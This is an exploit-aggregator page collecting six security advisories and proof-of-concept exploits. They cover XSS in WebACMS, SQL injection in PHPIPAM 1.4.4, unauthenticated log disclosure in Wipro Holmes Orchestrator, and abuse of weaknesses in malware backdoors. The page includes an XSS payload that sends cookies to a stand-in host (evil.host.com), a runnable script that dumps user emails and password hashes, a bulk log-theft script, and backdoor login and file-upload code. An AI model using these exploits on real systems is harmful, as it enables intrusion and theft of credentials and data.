Latest exploits :: CodePwn

<pre><code>Advisory ID: TO-2021-001 Product: WebACMS Vendor: AFI Solutions GmbH Tested Version: 2.1.0 Fixed Version: - Vulnerability Type: Cross-Site Scripting (CWE-79) CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:P/A:N (Score 6.4) CVSSv3 Severity: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Score 6.1) Solution Status: Unfixed Manufacturer Notification: 2021-12-13 Solution Date: 2022-01-17 Public Disclosure: 2022-01-20 CVE Reference: CVE-2021-44829 Authors of Advisory: Patrick Hener & Siva Rajendran, Thinking Objects GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The product "ACMS" of AFI Solutions GmbH [1] is a so called edi converter. For companies to be able to exchange arbitrary data it is common to use a edi converter to convert between data formats of the sender and the recipient. The product of AFI Solutions also incorporates a web interface, which is the subject of this advisory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The index page has a parameter "ID" which is used to navigate within the web application. It is not properly sanitized and will be rendered into the login form of the index page, as well. The vulnerable code will be shown from the following listing: <FORM name=thisForm METHOD=post action="/index.html?id=1" target="_top"> <table class="logintable"> <tr> <td width="110">Benutzername</td> [.. truncated ..] </form> The parameter can be chosen from the actual url in the browser and thus is unsanitized user controlled input. This makes the application vulnerable to reflected Cross-Site Scripting. This vulnerability also applies to basically all user controlled input after login. Also content returned by the database is not properly sanitized before presentation, as well. Therefore the app is also vulnerable to stored Cross-Site Scripting. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following request will steal the applications insecure cookies using this vulnerablity. GET /index.html?id=%22%3E%3Cscript%3Edocument.location=%27http://evil.host.com /cookies?%27%2Bdocument.cookie;%3C/script%3E%3Cid=%22 HTTP/1.1 Host: vulnerable.host.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif, image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: COMID= Upgrade-Insecure-Requests: 1 This will render to the following html code and trigger in a victims browser. <FORM name=thisForm METHOD=post action="/index.html?id="><script> document.location='http://evil.host.com/cookies?'+document.cookie;</script> <id="" target="_top"> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The user supplied data should be sanitized before using it to render a page. Also database retrieved content should be sanitized before presenting it to the browser again. The vendor states that this software component was only used by the vendors support and that it is not used actively anymore. The vendor recommends to deactivate this component. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-12-10: Vulnerability discovered 2021-12-13: Vulnerability reported to manufacturer 2022-01-17: Solution provided by manufacturer 2022-01-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Vendor Website https://www.afi-solutions.com/ [2] Thinking Objects Security Advisory https://blog.to.com/advisory-webacms-2-1-0-cross-site-scripting [3] Thinking Objects Responsible Disclosure Policy https://blog.to.com/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Patrick Hener and Siva Rajendran of Thinking Objects GmbH. E-Mail: patrick.hener@to.com Public Keys: https://to.com/pgp-keys Key ID: 877756EA2CB50685 Key Fingerprint: 2605 3D51 3FAA 3795 E116 95EC 8777 56EA 2CB5 0685 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/d2b933ebadd5c808ca4c68ae173e2d62.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.ad Vulnerability: Insecure Credential Storage Description: The malware listens on TCP port 87, its default password "hoanggia" is stored in the Windows registry in cleartext under "clrprv.oo" in "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\System\NPP". The password is also set as cookie value "Cookie: pass=hoanggia; day=14; month=11; year=2021", which also gets sent over the network in plaintext. Third party attackers who can access the system or sniff traffic can grab the password, then execute any programs and or run commands made available by the backdoor. Execute programs http://x.x.x.x:87/brow?exe=C:\Windows\system32\calc.exe Screenshots http://x.x.x.x:87/scrs? Websites visited http://x.x.x.x:87/web? Keys pressed http://x.x.x.x:87/key? File system browsing http://x.x.x.x:87/brow? Apps used http://x.x.x.x:87/run? Outlook emails http://x.x.x.x:87/chatoutlook?app=out Misc CMDs http://x.x.x.x:87/main?cmd=shutdown http://x.x.x.x:87/main?cmd=logoff http://x.x.x.x:87/main?cmd=reboot Type: PE MD5: d2b933ebadd5c808ca4c68ae173e2d62 Vuln ID: MVID-2021-0406 Disclosure: 11/21/2021 Exploit/PoC: import requests with requests.Session() as s: p = s.post("http://x.x.x.x:87/main", data={'pass':"hoanggia"}) r = s.get("http://x.x.x.x:87/brow?exe=calc") print(r.status_code) Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated) # Google Dork: [if applicable] # Date: 20/01/2022 # Exploit Author: Rodolfo "Inc0gbyt3" Tavares # Vendor Homepage: https://github.com/phpipam/phpipam # Software Link: https://github.com/phpipam/phpipam # Version: 1.4.4 # Tested on: Linux/Windows # CVE : CVE-2022-23046 import requests import sys import argparse ################ """ Author of exploit: Rodolfo 'Inc0gbyt3' Tavares CVE: CVE-2022-23046 Type: SQL Injection Usage: $ python3 -m pip install requests $ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password> """ ############### __author__ = "Inc0gbyt3" menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046") menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str) menu.add_argument("-U", "--user", help="[+] Username", type=str) menu.add_argument("-P", "--password", help="[+] Password", type=str) args = menu.parse_args() if len(sys.argv) < 3: menu.print_help() target = args.url user = args.user password = args.password def get_token(): u = f"{target}/app/login/login_check.php" try: r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password}) headers = r.headers['Set-Cookie'] headers_string = headers.split(';') for s in headers_string: if "phpipam" in s and "," in s: # double same cookie Check LoL cookie = s.strip(',').lstrip() return cookie except Exception as e: print(f"[+] {e}") def exploit_sqli(): cookie = get_token() xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php" data = { "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :) "bgp_id":1 } headers = { "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie": cookie } try: r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data) if "admin" in r.text or "rounds" in r.text: print("[+] Vulnerable..\n\n") print(f"> Users and hash passwords: \n\n{r.text}") print("\n\n> DONE <") except Exception as e: print(f"[-] {e}") if __name__ == '__main__': exploit_sqli() </code></pre>

<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure # Date: 09/08/2021 # Exploit Author: Rizal Muhammed @ub3rsick # Vendor Homepage: https://www.wipro.com/holmes/ # Version: 20.4.1 # Tested on: Windows 10 x64 # CVE : CVE-2021-38283 import requests as rq import argparse import datetime import os from calendar import monthrange from multiprocessing.dummy import Pool as ThreadPool from functools import partial # Change if running on different port port = 8001 log_list = [ "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt", "CustomerDomainCredentialService.txt", "CustomerFileService.txt", "CustomerService.txt", "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt", "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt", "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt", "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt", "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt", "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt", "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt" ] def check_month(val): ival = int(val) if ival > 0 and ival < 13: return ival else: raise argparse.ArgumentTypeError("%s is not a valid month" % val) def check_year(val): iyear = int(val) if iyear >= 1960 and iyear <= datetime.date.today().year: return iyear else: raise argparse.ArgumentTypeError("%s is not a valid year" % val) def do_request(target, date, log_file): log_url = "http://%s/log/%s/%s" % (target, date, log_file) log_name = "%s_%s" % (date, log_file) print ("[*] Requesting Log: /log/%s/%s" % (date, log_file)) resp = rq.get(log_url) if resp.status_code == 200 and not "Wipro Ltd." in resp.text: print ("[+] Success : %s" % log_url) #print (resp.text[0:150] + "\n<...snipped...>") with open("logs/%s" % log_name, 'w') as lf: lf.write(resp.text) lf.close() print ("[*] Log File Written to ./logs/%s" % (log_name)) def main(): parser = argparse.ArgumentParser( description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure", epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick" ) parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True) parser.add_argument("-m","--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month) parser.add_argument("-y","--year", help="year of the log", required=True, type=check_year) args = parser.parse_args() ndays = monthrange(args.year, args.month)[1] date_list = ["%s" % datetime.date(args.year, args.month,day) for day in range(1,ndays+1,1)] target = "%s:%s" % (args.target_ip, port) # create folder "logs" to save log files, if does not exist if not os.path.exists("./logs"): os.makedirs("./logs") for log_date in date_list: for log_file in log_list: do_request(target, log_date, log_file) if __name__ == "__main__": main() </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/09dd14d3988e08a56798b1480c55a5b0_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.FTP99 Vulnerability: Port Bounce Scan (MITM) Description: The malware listens on TCP port 1492. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you. Type: PE32 MD5: 09dd14d3988e08a56798b1480c55a5b0 Vuln ID: MVID-2022-0466 Dropped files: Windll16.exe Disclosure: 01/24/2022 Exploit/PoC: nmap -n -Pn -b hackcity:@192.168.18.129:1492 -p21,22,80 192.168.18.237 -v Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-17 16:29 UTC-11 Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129). Attempting connection to ftp://hackcity:@192.168.18.129:1492 Connected:220-Serv-U FTP-Server v2.3b for WinSock ready... 220 0wn3d Login credentials accepted by FTP server! Initiating Bounce Scan at 16:29 Removed 21 Changed my mind about port 21 Discovered open port 80/tcp on 192.168.18.237 Removed 22 Changed my mind about port 22 Completed Bounce Scan at 16:29, 2.17s elapsed (3 total ports) Nmap scan report for 192.168.18.237 Host is up. PORT STATE SERVICE 21/tcp closed ftp 22/tcp closed ssh 80/tcp open http Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/09dd14d3988e08a56798b1480c55a5b0.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.FTP99 Vulnerability: Authentication Bypass Race Condition Description: The malware listens on TCP port 1492. Credentials are stored in cleartext in "Serv-u.ini" file under "C:\Program Files (x86)\My Paquet archive" with a blank password. Third-party attackers who can reach the system before a password has been set can logon by just supplying the username "HACKCITY". "Serv-u.ini" [USER=hackcity] Password= HomeDir=c:\ AlwaysAllowLogin=YES Type: PE32 MD5: 09dd14d3988e08a56798b1480c55a5b0 Vuln ID: MVID-2022-0465 Dropped files: Windll16.exe Disclosure: 01/24/2022 Exploit/PoC: telnet.exe x.x.x.x 1492 220-Serv-U FTP-Server v2.3b for WinSock ready... 220 0wn3d 230 User HACKCITY logged in HELP 214- The following commands are recognized (* => unimplemented). USER PORT RETR ALLO DELE SITE XMKD CDUP PASS PASV STOR REST CWD STAT RMD XCUP ACCT TYPE APPE RNFR XCWD HELP XRMD STOU REIN STRU SMNT RNTO LIST NOOP PWD SIZE QUIT MODE SYST ABOR NLST MKD XPWD MDTM 214 Serv-U, registered to: Data Case SYST 215 UNIX Type: L8 PASV 227 Entering Passive Mode (192,168,18,129,206,190) STOR DOOM.exe 150 Opening ASCII mode data connection for DOOM.exe. STOR DOOM.exe 226 Transfer complete - file DOOM.exe received successfully from socket import * MALWARE_HOST="192.168.18.129" PORT=52926 DOOM="DOOM.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>